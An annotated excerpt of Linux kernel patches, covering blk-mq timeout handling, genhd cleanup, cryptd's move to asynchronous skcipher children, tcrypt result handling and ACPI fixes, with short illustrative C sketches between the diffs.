++	if (blk_mq_req_expired(rq, expired)) {
++		expired->has_timedout_rq = true;
++		return false;
++	}
++	return true;
++}
++
++static bool blk_mq_handle_expired(struct request *rq, void *priv)
++{
++	struct blk_expired_data *expired = priv;
++
++	if (blk_mq_req_expired(rq, expired))
+ 		blk_mq_rq_timed_out(rq);
+ 	return true;
+ }
+@@ -1579,7 +1596,9 @@ static void blk_mq_timeout_work(struct work_struct *work)
+ {
+ 	struct request_queue *q =
+ 		container_of(work, struct request_queue, timeout_work);
+-	unsigned long next = 0;
++	struct blk_expired_data expired = {
++		.timeout_start = jiffies,
++	};
+ 	struct blk_mq_hw_ctx *hctx;
+ 	unsigned long i;
+ 
+@@ -1599,10 +1618,23 @@ static void blk_mq_timeout_work(struct work_struct *work)
+ 	if (!percpu_ref_tryget(&q->q_usage_counter))
+ 		return;
+ 
+-	blk_mq_queue_tag_busy_iter(q, blk_mq_check_expired, &next);
++	/* check if there is any timed-out request */
++	blk_mq_queue_tag_busy_iter(q, blk_mq_check_expired, &expired);
++	if (expired.has_timedout_rq) {
++		/*
++		 * Before walking tags, we must ensure any submit started
++		 * before the current time has finished. Since the submit
++		 * uses srcu or rcu, wait for a synchronization point to
++		 * ensure all running submits have finished
++		 */
++		blk_mq_wait_quiesce_done(q);
++
++		expired.next = 0;
++		blk_mq_queue_tag_busy_iter(q, blk_mq_handle_expired, &expired);
++	}
+ 
+-	if (next != 0) {
+-		mod_timer(&q->timeout, next);
++	if (expired.next != 0) {
++		mod_timer(&q->timeout, expired.next);
+ 	} else {
+ 		/*
+ 		 * Request timeouts are handled as a forward rolling timer. If
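
Timeout handling is now two-pass: the first tag walk only records whether anything expired, comparing deadlines against a single jiffies snapshot taken when the scan started; only if something did does the queue wait for in-flight submissions to quiesce (blk_mq_wait_quiesce_done()) before a second walk actually fires the timeouts, so a request cannot be timed out while its submit path is still running. A compact sketch of the snapshot-and-two-pass structure, plain C with the quiesce step reduced to a comment:

#include <stdio.h>
#include <time.h>

struct req { time_t deadline; };

struct expired_data {
	int has_timedout;
	time_t next;
	time_t scan_start;        /* one snapshot for both passes */
};

static int req_expired(const struct req *r, struct expired_data *e)
{
	if (e->scan_start >= r->deadline)
		return 1;
	if (e->next == 0 || r->deadline < e->next)
		e->next = r->deadline;   /* earliest future deadline */
	return 0;
}

int main(void)
{
	struct req reqs[2];
	struct expired_data e = { .scan_start = time(NULL) };
	int i;

	reqs[0].deadline = e.scan_start - 5;    /* already expired */
	reqs[1].deadline = e.scan_start + 30;

	for (i = 0; i < 2; i++)                 /* pass 1: detect only */
		if (req_expired(&reqs[i], &e))
			e.has_timedout = 1;

	if (e.has_timedout) {
		/* kernel: blk_mq_wait_quiesce_done(q) before acting */
		e.next = 0;
		for (i = 0; i < 2; i++)         /* pass 2: handle */
			if (req_expired(&reqs[i], &e))
				printf("request %d timed out\n", i);
	}
	if (e.next)
		printf("re-arm timer for +%lds\n",
		       (long)(e.next - e.scan_start));
	return 0;
}
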
+diff --git a/block/genhd.c b/block/genhd.c
+index 0f9769db2de83..647f7d8d88312 100644
+--- a/block/genhd.c
++++ b/block/genhd.c
+@@ -530,6 +530,7 @@ out_unregister_queue:
+ 	rq_qos_exit(disk->queue);
+ out_put_slave_dir:
+ 	kobject_put(disk->slave_dir);
++	disk->slave_dir = NULL;
+ out_put_holder_dir:
+ 	kobject_put(disk->part0->bd_holder_dir);
+ out_del_integrity:
+@@ -629,6 +630,7 @@ void del_gendisk(struct gendisk *disk)
+ 
+ 	kobject_put(disk->part0->bd_holder_dir);
+ 	kobject_put(disk->slave_dir);
++	disk->slave_dir = NULL;
+ 
+ 	part_stat_set_all(disk->part0, 0);
+ 	disk->part0->bd_stamp = 0;
+diff --git a/crypto/cryptd.c b/crypto/cryptd.c
+index 668095eca0faf..ca3a40fc7da91 100644
+--- a/crypto/cryptd.c
++++ b/crypto/cryptd.c
+@@ -68,11 +68,12 @@ struct aead_instance_ctx {
+ 
+ struct cryptd_skcipher_ctx {
+ 	refcount_t refcnt;
+-	struct crypto_sync_skcipher *child;
++	struct crypto_skcipher *child;
+ };
+ 
+ struct cryptd_skcipher_request_ctx {
+ 	crypto_completion_t complete;
++	struct skcipher_request req;
+ };
+ 
+ struct cryptd_hash_ctx {
+@@ -227,13 +228,13 @@ static int cryptd_skcipher_setkey(struct crypto_skcipher *parent,
+ 				  const u8 *key, unsigned int keylen)
+ {
+ 	struct cryptd_skcipher_ctx *ctx = crypto_skcipher_ctx(parent);
+-	struct crypto_sync_skcipher *child = ctx->child;
++	struct crypto_skcipher *child = ctx->child;
+ 
+-	crypto_sync_skcipher_clear_flags(child, CRYPTO_TFM_REQ_MASK);
+-	crypto_sync_skcipher_set_flags(child,
+-				       crypto_skcipher_get_flags(parent) &
+-					 CRYPTO_TFM_REQ_MASK);
+-	return crypto_sync_skcipher_setkey(child, key, keylen);
++	crypto_skcipher_clear_flags(child, CRYPTO_TFM_REQ_MASK);
++	crypto_skcipher_set_flags(child,
++				  crypto_skcipher_get_flags(parent) &
++				  CRYPTO_TFM_REQ_MASK);
++	return crypto_skcipher_setkey(child, key, keylen);
+ }
+ 
+ static void cryptd_skcipher_complete(struct skcipher_request *req, int err)
+@@ -258,13 +259,13 @@ static void cryptd_skcipher_encrypt(struct crypto_async_request *base,
+ 	struct cryptd_skcipher_request_ctx *rctx = skcipher_request_ctx(req);
+ 	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+ 	struct cryptd_skcipher_ctx *ctx = crypto_skcipher_ctx(tfm);
+-	struct crypto_sync_skcipher *child = ctx->child;
+-	SYNC_SKCIPHER_REQUEST_ON_STACK(subreq, child);
++	struct skcipher_request *subreq = &rctx->req;
++	struct crypto_skcipher *child = ctx->child;
+ 
+ 	if (unlikely(err == -EINPROGRESS))
+ 		goto out;
+ 
+-	skcipher_request_set_sync_tfm(subreq, child);
++	skcipher_request_set_tfm(subreq, child);
+ 	skcipher_request_set_callback(subreq, CRYPTO_TFM_REQ_MAY_SLEEP,
+ 				      NULL, NULL);
+ 	skcipher_request_set_crypt(subreq, req->src, req->dst, req->cryptlen,
+@@ -286,13 +287,13 @@ static void cryptd_skcipher_decrypt(struct crypto_async_request *base,
+ 	struct cryptd_skcipher_request_ctx *rctx = skcipher_request_ctx(req);
+ 	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+ 	struct cryptd_skcipher_ctx *ctx = crypto_skcipher_ctx(tfm);
+-	struct crypto_sync_skcipher *child = ctx->child;
+-	SYNC_SKCIPHER_REQUEST_ON_STACK(subreq, child);
++	struct skcipher_request *subreq = &rctx->req;
++	struct crypto_skcipher *child = ctx->child;
+ 
+ 	if (unlikely(err == -EINPROGRESS))
+ 		goto out;
+ 
+-	skcipher_request_set_sync_tfm(subreq, child);
++	skcipher_request_set_tfm(subreq, child);
+ 	skcipher_request_set_callback(subreq, CRYPTO_TFM_REQ_MAY_SLEEP,
+ 				      NULL, NULL);
+ 	skcipher_request_set_crypt(subreq, req->src, req->dst, req->cryptlen,
+@@ -343,9 +344,10 @@ static int cryptd_skcipher_init_tfm(struct crypto_skcipher *tfm)
+ 	if (IS_ERR(cipher))
+ 		return PTR_ERR(cipher);
+ 
+-	ctx->child = (struct crypto_sync_skcipher *)cipher;
++	ctx->child = cipher;
+ 	crypto_skcipher_set_reqsize(
+-		tfm, sizeof(struct cryptd_skcipher_request_ctx));
++		tfm, sizeof(struct cryptd_skcipher_request_ctx) +
++		     crypto_skcipher_reqsize(cipher));
+ 	return 0;
+ }
+ 
+@@ -353,7 +355,7 @@ static void cryptd_skcipher_exit_tfm(struct crypto_skcipher *tfm)
+ {
+ 	struct cryptd_skcipher_ctx *ctx = crypto_skcipher_ctx(tfm);
+ 
+-	crypto_free_sync_skcipher(ctx->child);
++	crypto_free_skcipher(ctx->child);
+ }
+ 
+ static void cryptd_skcipher_free(struct skcipher_instance *inst)
+@@ -931,7 +933,7 @@ struct crypto_skcipher *cryptd_skcipher_child(struct cryptd_skcipher *tfm)
+ {
+ 	struct cryptd_skcipher_ctx *ctx = crypto_skcipher_ctx(&tfm->base);
+ 
+-	return &ctx->child->base;
++	return ctx->child;
+ }
+ EXPORT_SYMBOL_GPL(cryptd_skcipher_child);
+ 
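
The cryptd conversion drops the on-stack SYNC_SKCIPHER_REQUEST_ON_STACK subrequest in favor of embedding the child's request in the per-request context, growing the parent's reqsize by crypto_skcipher_reqsize(child); that is what lifts the "child must be synchronous" restriction. The allocation shape, as a standalone sketch with a C flexible array member:

#include <stdio.h>
#include <stdlib.h>

struct parent_ctx {
	void *complete;          /* fixed-size part of the context */
	unsigned char child[];   /* child request tail, runtime-sized */
};

int main(void)
{
	size_t child_size = 64;  /* stand-in for crypto_skcipher_reqsize() */
	struct parent_ctx *ctx = malloc(sizeof(*ctx) + child_size);

	if (!ctx)
		return 1;
	printf("one allocation: %zu fixed + %zu child bytes\n",
	       sizeof(*ctx), child_size);
	free(ctx);
	return 0;
}
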
+diff --git a/crypto/tcrypt.c b/crypto/tcrypt.c
+index a82679b576bb4..b23235d58a122 100644
+--- a/crypto/tcrypt.c
++++ b/crypto/tcrypt.c
+@@ -1090,15 +1090,6 @@ static void test_mb_skcipher_speed(const char *algo, int enc, int secs,
+ 			goto out_free_tfm;
+ 		}
+ 
+-
+-	for (i = 0; i < num_mb; ++i)
+-		if (testmgr_alloc_buf(data[i].xbuf)) {
+-			while (i--)
+-				testmgr_free_buf(data[i].xbuf);
+-			goto out_free_tfm;
+-		}
+-
+-
+ 	for (i = 0; i < num_mb; ++i) {
+ 		data[i].req = skcipher_request_alloc(tfm, GFP_KERNEL);
+ 		if (!data[i].req) {
+@@ -1471,387 +1462,387 @@ static int do_test(const char *alg, u32 type, u32 mask, int m, u32 num_mb)
+ 		}
+ 
+ 		for (i = 1; i < 200; i++)
+-			ret += do_test(NULL, 0, 0, i, num_mb);
++			ret = min(ret, do_test(NULL, 0, 0, i, num_mb));
+ 		break;
+ 
+ 	case 1:
+-		ret += tcrypt_test("md5");
++		ret = min(ret, tcrypt_test("md5"));
+ 		break;
+ 
+ 	case 2:
+-		ret += tcrypt_test("sha1");
++		ret = min(ret, tcrypt_test("sha1"));
+ 		break;
+ 
+ 	case 3:
+-		ret += tcrypt_test("ecb(des)");
+-		ret += tcrypt_test("cbc(des)");
+-		ret += tcrypt_test("ctr(des)");
++		ret = min(ret, tcrypt_test("ecb(des)"));
++		ret = min(ret, tcrypt_test("cbc(des)"));
++		ret = min(ret, tcrypt_test("ctr(des)"));
+ 		break;
+ 
+ 	case 4:
+-		ret += tcrypt_test("ecb(des3_ede)");
+-		ret += tcrypt_test("cbc(des3_ede)");
+-		ret += tcrypt_test("ctr(des3_ede)");
++		ret = min(ret, tcrypt_test("ecb(des3_ede)"));
++		ret = min(ret, tcrypt_test("cbc(des3_ede)"));
++		ret = min(ret, tcrypt_test("ctr(des3_ede)"));
+ 		break;
+ 
+ 	case 5:
+-		ret += tcrypt_test("md4");
++		ret = min(ret, tcrypt_test("md4"));
+ 		break;
+ 
+ 	case 6:
+-		ret += tcrypt_test("sha256");
++		ret = min(ret, tcrypt_test("sha256"));
+ 		break;
+ 
+ 	case 7:
+-		ret += tcrypt_test("ecb(blowfish)");
+-		ret += tcrypt_test("cbc(blowfish)");
+-		ret += tcrypt_test("ctr(blowfish)");
++		ret = min(ret, tcrypt_test("ecb(blowfish)"));
++		ret = min(ret, tcrypt_test("cbc(blowfish)"));
++		ret = min(ret, tcrypt_test("ctr(blowfish)"));
+ 		break;
+ 
+ 	case 8:
+-		ret += tcrypt_test("ecb(twofish)");
+-		ret += tcrypt_test("cbc(twofish)");
+-		ret += tcrypt_test("ctr(twofish)");
+-		ret += tcrypt_test("lrw(twofish)");
+-		ret += tcrypt_test("xts(twofish)");
++		ret = min(ret, tcrypt_test("ecb(twofish)"));
++		ret = min(ret, tcrypt_test("cbc(twofish)"));
++		ret = min(ret, tcrypt_test("ctr(twofish)"));
++		ret = min(ret, tcrypt_test("lrw(twofish)"));
++		ret = min(ret, tcrypt_test("xts(twofish)"));
+ 		break;
+ 
+ 	case 9:
+-		ret += tcrypt_test("ecb(serpent)");
+-		ret += tcrypt_test("cbc(serpent)");
+-		ret += tcrypt_test("ctr(serpent)");
+-		ret += tcrypt_test("lrw(serpent)");
+-		ret += tcrypt_test("xts(serpent)");
++		ret = min(ret, tcrypt_test("ecb(serpent)"));
++		ret = min(ret, tcrypt_test("cbc(serpent)"));
++		ret = min(ret, tcrypt_test("ctr(serpent)"));
++		ret = min(ret, tcrypt_test("lrw(serpent)"));
++		ret = min(ret, tcrypt_test("xts(serpent)"));
+ 		break;
+ 
+ 	case 10:
+-		ret += tcrypt_test("ecb(aes)");
+-		ret += tcrypt_test("cbc(aes)");
+-		ret += tcrypt_test("lrw(aes)");
+-		ret += tcrypt_test("xts(aes)");
+-		ret += tcrypt_test("ctr(aes)");
+-		ret += tcrypt_test("rfc3686(ctr(aes))");
+-		ret += tcrypt_test("ofb(aes)");
+-		ret += tcrypt_test("cfb(aes)");
+-		ret += tcrypt_test("xctr(aes)");
++		ret = min(ret, tcrypt_test("ecb(aes)"));
++		ret = min(ret, tcrypt_test("cbc(aes)"));
++		ret = min(ret, tcrypt_test("lrw(aes)"));
++		ret = min(ret, tcrypt_test("xts(aes)"));
++		ret = min(ret, tcrypt_test("ctr(aes)"));
++		ret = min(ret, tcrypt_test("rfc3686(ctr(aes))"));
++		ret = min(ret, tcrypt_test("ofb(aes)"));
++		ret = min(ret, tcrypt_test("cfb(aes)"));
++		ret = min(ret, tcrypt_test("xctr(aes)"));
+ 		break;
+ 
+ 	case 11:
+-		ret += tcrypt_test("sha384");
++		ret = min(ret, tcrypt_test("sha384"));
+ 		break;
+ 
+ 	case 12:
+-		ret += tcrypt_test("sha512");
++		ret = min(ret, tcrypt_test("sha512"));
+ 		break;
+ 
+ 	case 13:
+-		ret += tcrypt_test("deflate");
++		ret = min(ret, tcrypt_test("deflate"));
+ 		break;
+ 
+ 	case 14:
+-		ret += tcrypt_test("ecb(cast5)");
+-		ret += tcrypt_test("cbc(cast5)");
+-		ret += tcrypt_test("ctr(cast5)");
++		ret = min(ret, tcrypt_test("ecb(cast5)"));
++		ret = min(ret, tcrypt_test("cbc(cast5)"));
++		ret = min(ret, tcrypt_test("ctr(cast5)"));
+ 		break;
+ 
+ 	case 15:
+-		ret += tcrypt_test("ecb(cast6)");
+-		ret += tcrypt_test("cbc(cast6)");
+-		ret += tcrypt_test("ctr(cast6)");
+-		ret += tcrypt_test("lrw(cast6)");
+-		ret += tcrypt_test("xts(cast6)");
++		ret = min(ret, tcrypt_test("ecb(cast6)"));
++		ret = min(ret, tcrypt_test("cbc(cast6)"));
++		ret = min(ret, tcrypt_test("ctr(cast6)"));
++		ret = min(ret, tcrypt_test("lrw(cast6)"));
++		ret = min(ret, tcrypt_test("xts(cast6)"));
+ 		break;
+ 
+ 	case 16:
+-		ret += tcrypt_test("ecb(arc4)");
++		ret = min(ret, tcrypt_test("ecb(arc4)"));
+ 		break;
+ 
+ 	case 17:
+-		ret += tcrypt_test("michael_mic");
++		ret = min(ret, tcrypt_test("michael_mic"));
+ 		break;
+ 
+ 	case 18:
+-		ret += tcrypt_test("crc32c");
++		ret = min(ret, tcrypt_test("crc32c"));
+ 		break;
+ 
+ 	case 19:
+-		ret += tcrypt_test("ecb(tea)");
++		ret = min(ret, tcrypt_test("ecb(tea)"));
+ 		break;
+ 
+ 	case 20:
+-		ret += tcrypt_test("ecb(xtea)");
++		ret = min(ret, tcrypt_test("ecb(xtea)"));
+ 		break;
+ 
+ 	case 21:
+-		ret += tcrypt_test("ecb(khazad)");
++		ret = min(ret, tcrypt_test("ecb(khazad)"));
+ 		break;
+ 
+ 	case 22:
+-		ret += tcrypt_test("wp512");
++		ret = min(ret, tcrypt_test("wp512"));
+ 		break;
+ 
+ 	case 23:
+-		ret += tcrypt_test("wp384");
++		ret = min(ret, tcrypt_test("wp384"));
+ 		break;
+ 
+ 	case 24:
+-		ret += tcrypt_test("wp256");
++		ret = min(ret, tcrypt_test("wp256"));
+ 		break;
+ 
+ 	case 26:
+-		ret += tcrypt_test("ecb(anubis)");
+-		ret += tcrypt_test("cbc(anubis)");
++		ret = min(ret, tcrypt_test("ecb(anubis)"));
++		ret = min(ret, tcrypt_test("cbc(anubis)"));
+ 		break;
+ 
+ 	case 30:
+-		ret += tcrypt_test("ecb(xeta)");
++		ret = min(ret, tcrypt_test("ecb(xeta)"));
+ 		break;
+ 
+ 	case 31:
+-		ret += tcrypt_test("pcbc(fcrypt)");
++		ret = min(ret, tcrypt_test("pcbc(fcrypt)"));
+ 		break;
+ 
+ 	case 32:
+-		ret += tcrypt_test("ecb(camellia)");
+-		ret += tcrypt_test("cbc(camellia)");
+-		ret += tcrypt_test("ctr(camellia)");
+-		ret += tcrypt_test("lrw(camellia)");
+-		ret += tcrypt_test("xts(camellia)");
++		ret = min(ret, tcrypt_test("ecb(camellia)"));
++		ret = min(ret, tcrypt_test("cbc(camellia)"));
++		ret = min(ret, tcrypt_test("ctr(camellia)"));
++		ret = min(ret, tcrypt_test("lrw(camellia)"));
++		ret = min(ret, tcrypt_test("xts(camellia)"));
+ 		break;
+ 
+ 	case 33:
+-		ret += tcrypt_test("sha224");
++		ret = min(ret, tcrypt_test("sha224"));
+ 		break;
+ 
+ 	case 35:
+-		ret += tcrypt_test("gcm(aes)");
++		ret = min(ret, tcrypt_test("gcm(aes)"));
+ 		break;
+ 
+ 	case 36:
+-		ret += tcrypt_test("lzo");
++		ret = min(ret, tcrypt_test("lzo"));
+ 		break;
+ 
+ 	case 37:
+-		ret += tcrypt_test("ccm(aes)");
++		ret = min(ret, tcrypt_test("ccm(aes)"));
+ 		break;
+ 
+ 	case 38:
+-		ret += tcrypt_test("cts(cbc(aes))");
++		ret = min(ret, tcrypt_test("cts(cbc(aes))"));
+ 		break;
+ 
+         case 39:
+-		ret += tcrypt_test("xxhash64");
++		ret = min(ret, tcrypt_test("xxhash64"));
+ 		break;
+ 
+         case 40:
+-		ret += tcrypt_test("rmd160");
++		ret = min(ret, tcrypt_test("rmd160"));
+ 		break;
+ 
+ 	case 42:
+-		ret += tcrypt_test("blake2b-512");
++		ret = min(ret, tcrypt_test("blake2b-512"));
+ 		break;
+ 
+ 	case 43:
+-		ret += tcrypt_test("ecb(seed)");
++		ret = min(ret, tcrypt_test("ecb(seed)"));
+ 		break;
+ 
+ 	case 45:
+-		ret += tcrypt_test("rfc4309(ccm(aes))");
++		ret = min(ret, tcrypt_test("rfc4309(ccm(aes))"));
+ 		break;
+ 
+ 	case 46:
+-		ret += tcrypt_test("ghash");
++		ret = min(ret, tcrypt_test("ghash"));
+ 		break;
+ 
+ 	case 47:
+-		ret += tcrypt_test("crct10dif");
++		ret = min(ret, tcrypt_test("crct10dif"));
+ 		break;
+ 
+ 	case 48:
+-		ret += tcrypt_test("sha3-224");
++		ret = min(ret, tcrypt_test("sha3-224"));
+ 		break;
+ 
+ 	case 49:
+-		ret += tcrypt_test("sha3-256");
++		ret = min(ret, tcrypt_test("sha3-256"));
+ 		break;
+ 
+ 	case 50:
+-		ret += tcrypt_test("sha3-384");
++		ret = min(ret, tcrypt_test("sha3-384"));
+ 		break;
+ 
+ 	case 51:
+-		ret += tcrypt_test("sha3-512");
++		ret = min(ret, tcrypt_test("sha3-512"));
+ 		break;
+ 
+ 	case 52:
+-		ret += tcrypt_test("sm3");
++		ret = min(ret, tcrypt_test("sm3"));
+ 		break;
+ 
+ 	case 53:
+-		ret += tcrypt_test("streebog256");
++		ret = min(ret, tcrypt_test("streebog256"));
+ 		break;
+ 
+ 	case 54:
+-		ret += tcrypt_test("streebog512");
++		ret = min(ret, tcrypt_test("streebog512"));
+ 		break;
+ 
+ 	case 55:
+-		ret += tcrypt_test("gcm(sm4)");
++		ret = min(ret, tcrypt_test("gcm(sm4)"));
+ 		break;
+ 
+ 	case 56:
+-		ret += tcrypt_test("ccm(sm4)");
++		ret = min(ret, tcrypt_test("ccm(sm4)"));
+ 		break;
+ 
+ 	case 57:
+-		ret += tcrypt_test("polyval");
++		ret = min(ret, tcrypt_test("polyval"));
+ 		break;
+ 
+ 	case 58:
+-		ret += tcrypt_test("gcm(aria)");
++		ret = min(ret, tcrypt_test("gcm(aria)"));
+ 		break;
+ 
+ 	case 100:
+-		ret += tcrypt_test("hmac(md5)");
++		ret = min(ret, tcrypt_test("hmac(md5)"));
+ 		break;
+ 
+ 	case 101:
+-		ret += tcrypt_test("hmac(sha1)");
++		ret = min(ret, tcrypt_test("hmac(sha1)"));
+ 		break;
+ 
+ 	case 102:
+-		ret += tcrypt_test("hmac(sha256)");
++		ret = min(ret, tcrypt_test("hmac(sha256)"));
+ 		break;
+ 
+ 	case 103:
+-		ret += tcrypt_test("hmac(sha384)");
++		ret = min(ret, tcrypt_test("hmac(sha384)"));
+ 		break;
+ 
+ 	case 104:
+-		ret += tcrypt_test("hmac(sha512)");
++		ret = min(ret, tcrypt_test("hmac(sha512)"));
+ 		break;
+ 
+ 	case 105:
+-		ret += tcrypt_test("hmac(sha224)");
++		ret = min(ret, tcrypt_test("hmac(sha224)"));
+ 		break;
+ 
+ 	case 106:
+-		ret += tcrypt_test("xcbc(aes)");
++		ret = min(ret, tcrypt_test("xcbc(aes)"));
+ 		break;
+ 
+ 	case 108:
+-		ret += tcrypt_test("hmac(rmd160)");
++		ret = min(ret, tcrypt_test("hmac(rmd160)"));
+ 		break;
+ 
+ 	case 109:
+-		ret += tcrypt_test("vmac64(aes)");
++		ret = min(ret, tcrypt_test("vmac64(aes)"));
+ 		break;
+ 
+ 	case 111:
+-		ret += tcrypt_test("hmac(sha3-224)");
++		ret = min(ret, tcrypt_test("hmac(sha3-224)"));
+ 		break;
+ 
+ 	case 112:
+-		ret += tcrypt_test("hmac(sha3-256)");
++		ret = min(ret, tcrypt_test("hmac(sha3-256)"));
+ 		break;
+ 
+ 	case 113:
+-		ret += tcrypt_test("hmac(sha3-384)");
++		ret = min(ret, tcrypt_test("hmac(sha3-384)"));
+ 		break;
+ 
+ 	case 114:
+-		ret += tcrypt_test("hmac(sha3-512)");
++		ret = min(ret, tcrypt_test("hmac(sha3-512)"));
+ 		break;
+ 
+ 	case 115:
+-		ret += tcrypt_test("hmac(streebog256)");
++		ret = min(ret, tcrypt_test("hmac(streebog256)"));
+ 		break;
+ 
+ 	case 116:
+-		ret += tcrypt_test("hmac(streebog512)");
++		ret = min(ret, tcrypt_test("hmac(streebog512)"));
+ 		break;
+ 
+ 	case 150:
+-		ret += tcrypt_test("ansi_cprng");
++		ret = min(ret, tcrypt_test("ansi_cprng"));
+ 		break;
+ 
+ 	case 151:
+-		ret += tcrypt_test("rfc4106(gcm(aes))");
++		ret = min(ret, tcrypt_test("rfc4106(gcm(aes))"));
+ 		break;
+ 
+ 	case 152:
+-		ret += tcrypt_test("rfc4543(gcm(aes))");
++		ret = min(ret, tcrypt_test("rfc4543(gcm(aes))"));
+ 		break;
+ 
+ 	case 153:
+-		ret += tcrypt_test("cmac(aes)");
++		ret = min(ret, tcrypt_test("cmac(aes)"));
+ 		break;
+ 
+ 	case 154:
+-		ret += tcrypt_test("cmac(des3_ede)");
++		ret = min(ret, tcrypt_test("cmac(des3_ede)"));
+ 		break;
+ 
+ 	case 155:
+-		ret += tcrypt_test("authenc(hmac(sha1),cbc(aes))");
++		ret = min(ret, tcrypt_test("authenc(hmac(sha1),cbc(aes))"));
+ 		break;
+ 
+ 	case 156:
+-		ret += tcrypt_test("authenc(hmac(md5),ecb(cipher_null))");
++		ret = min(ret, tcrypt_test("authenc(hmac(md5),ecb(cipher_null))"));
+ 		break;
+ 
+ 	case 157:
+-		ret += tcrypt_test("authenc(hmac(sha1),ecb(cipher_null))");
++		ret = min(ret, tcrypt_test("authenc(hmac(sha1),ecb(cipher_null))"));
+ 		break;
+ 
+ 	case 158:
+-		ret += tcrypt_test("cbcmac(sm4)");
++		ret = min(ret, tcrypt_test("cbcmac(sm4)"));
+ 		break;
+ 
+ 	case 159:
+-		ret += tcrypt_test("cmac(sm4)");
++		ret = min(ret, tcrypt_test("cmac(sm4)"));
+ 		break;
+ 
+ 	case 181:
+-		ret += tcrypt_test("authenc(hmac(sha1),cbc(des))");
++		ret = min(ret, tcrypt_test("authenc(hmac(sha1),cbc(des))"));
+ 		break;
+ 	case 182:
+-		ret += tcrypt_test("authenc(hmac(sha1),cbc(des3_ede))");
++		ret = min(ret, tcrypt_test("authenc(hmac(sha1),cbc(des3_ede))"));
+ 		break;
+ 	case 183:
+-		ret += tcrypt_test("authenc(hmac(sha224),cbc(des))");
++		ret = min(ret, tcrypt_test("authenc(hmac(sha224),cbc(des))"));
+ 		break;
+ 	case 184:
+-		ret += tcrypt_test("authenc(hmac(sha224),cbc(des3_ede))");
++		ret = min(ret, tcrypt_test("authenc(hmac(sha224),cbc(des3_ede))"));
+ 		break;
+ 	case 185:
+-		ret += tcrypt_test("authenc(hmac(sha256),cbc(des))");
++		ret = min(ret, tcrypt_test("authenc(hmac(sha256),cbc(des))"));
+ 		break;
+ 	case 186:
+-		ret += tcrypt_test("authenc(hmac(sha256),cbc(des3_ede))");
++		ret = min(ret, tcrypt_test("authenc(hmac(sha256),cbc(des3_ede))"));
+ 		break;
+ 	case 187:
+-		ret += tcrypt_test("authenc(hmac(sha384),cbc(des))");
++		ret = min(ret, tcrypt_test("authenc(hmac(sha384),cbc(des))"));
+ 		break;
+ 	case 188:
+-		ret += tcrypt_test("authenc(hmac(sha384),cbc(des3_ede))");
++		ret = min(ret, tcrypt_test("authenc(hmac(sha384),cbc(des3_ede))"));
+ 		break;
+ 	case 189:
+-		ret += tcrypt_test("authenc(hmac(sha512),cbc(des))");
++		ret = min(ret, tcrypt_test("authenc(hmac(sha512),cbc(des))"));
+ 		break;
+ 	case 190:
+-		ret += tcrypt_test("authenc(hmac(sha512),cbc(des3_ede))");
++		ret = min(ret, tcrypt_test("authenc(hmac(sha512),cbc(des3_ede))"));
+ 		break;
+ 	case 191:
+-		ret += tcrypt_test("ecb(sm4)");
+-		ret += tcrypt_test("cbc(sm4)");
+-		ret += tcrypt_test("cfb(sm4)");
+-		ret += tcrypt_test("ctr(sm4)");
++		ret = min(ret, tcrypt_test("ecb(sm4)"));
++		ret = min(ret, tcrypt_test("cbc(sm4)"));
++		ret = min(ret, tcrypt_test("cfb(sm4)"));
++		ret = min(ret, tcrypt_test("ctr(sm4)"));
+ 		break;
+ 	case 192:
+-		ret += tcrypt_test("ecb(aria)");
+-		ret += tcrypt_test("cbc(aria)");
+-		ret += tcrypt_test("cfb(aria)");
+-		ret += tcrypt_test("ctr(aria)");
++		ret = min(ret, tcrypt_test("ecb(aria)"));
++		ret = min(ret, tcrypt_test("cbc(aria)"));
++		ret = min(ret, tcrypt_test("cfb(aria)"));
++		ret = min(ret, tcrypt_test("ctr(aria)"));
+ 		break;
+ 	case 200:
+ 		test_cipher_speed("ecb(aes)", ENCRYPT, sec, NULL, 0,
+diff --git a/drivers/acpi/acpica/dsmethod.c b/drivers/acpi/acpica/dsmethod.c
+index ae2e768830bfc..9332bc688713c 100644
+--- a/drivers/acpi/acpica/dsmethod.c
++++ b/drivers/acpi/acpica/dsmethod.c
+@@ -517,7 +517,7 @@ acpi_ds_call_control_method(struct acpi_thread_state *thread,
+ 	info = ACPI_ALLOCATE_ZEROED(sizeof(struct acpi_evaluate_info));
+ 	if (!info) {
+ 		status = AE_NO_MEMORY;
+-		goto cleanup;
++		goto pop_walk_state;
+ 	}
+ 
+ 	info->parameters = &this_walk_state->operands[0];
+@@ -529,7 +529,7 @@ acpi_ds_call_control_method(struct acpi_thread_state *thread,
+ 
+ 	ACPI_FREE(info);
+ 	if (ACPI_FAILURE(status)) {
+-		goto cleanup;
++		goto pop_walk_state;
+ 	}
+ 
+ 	next_walk_state->method_nesting_depth =
+@@ -575,6 +575,12 @@ acpi_ds_call_control_method(struct acpi_thread_state *thread,
+ 
+ 	return_ACPI_STATUS(status);
+ 
++pop_walk_state:
++
++	/* On error, pop the walk state to be deleted from thread */
++
++	acpi_ds_pop_walk_state(thread);
++
+ cleanup:
+ 
+ 	/* On error, we must terminate the method properly */
+diff --git a/drivers/acpi/acpica/utcopy.c b/drivers/acpi/acpica/utcopy.c
+index 400b9e15a709c..63c17f420fb86 100644
+--- a/drivers/acpi/acpica/utcopy.c
++++ b/drivers/acpi/acpica/utcopy.c
+@@ -916,13 +916,6 @@ acpi_ut_copy_ipackage_to_ipackage(union acpi_operand_object *source_obj,
+ 	status = acpi_ut_walk_package_tree(source_obj, dest_obj,
+ 					   acpi_ut_copy_ielement_to_ielement,
+ 					   walk_state);
+-	if (ACPI_FAILURE(status)) {
+-
+-		/* On failure, delete the destination package object */
+-
+-		acpi_ut_remove_reference(dest_obj);
+-	}
+-
+ 	return_ACPI_STATUS(status);
+ }
+ 
+diff --git a/drivers/acpi/ec.c b/drivers/acpi/ec.c
+index 9b42628cf21b3..9751b84c1b221 100644
+--- a/drivers/acpi/ec.c
++++ b/drivers/acpi/ec.c
+@@ -1875,6 +1875,16 @@ static const struct dmi_system_id ec_dmi_table[] __initconst = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "HP Pavilion Gaming Laptop 15-cx0xxx"),
+ 		},
+ 	},
++	{
++		/*
++		 * HP Pavilion Gaming Laptop 15-cx0041ur
++		 */
++		.callback = ec_honor_dsdt_gpe,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "HP"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "HP 15-cx0041ur"),
++		},
++	},
+ 	{
+ 		/*
+ 		 * Samsung hardware
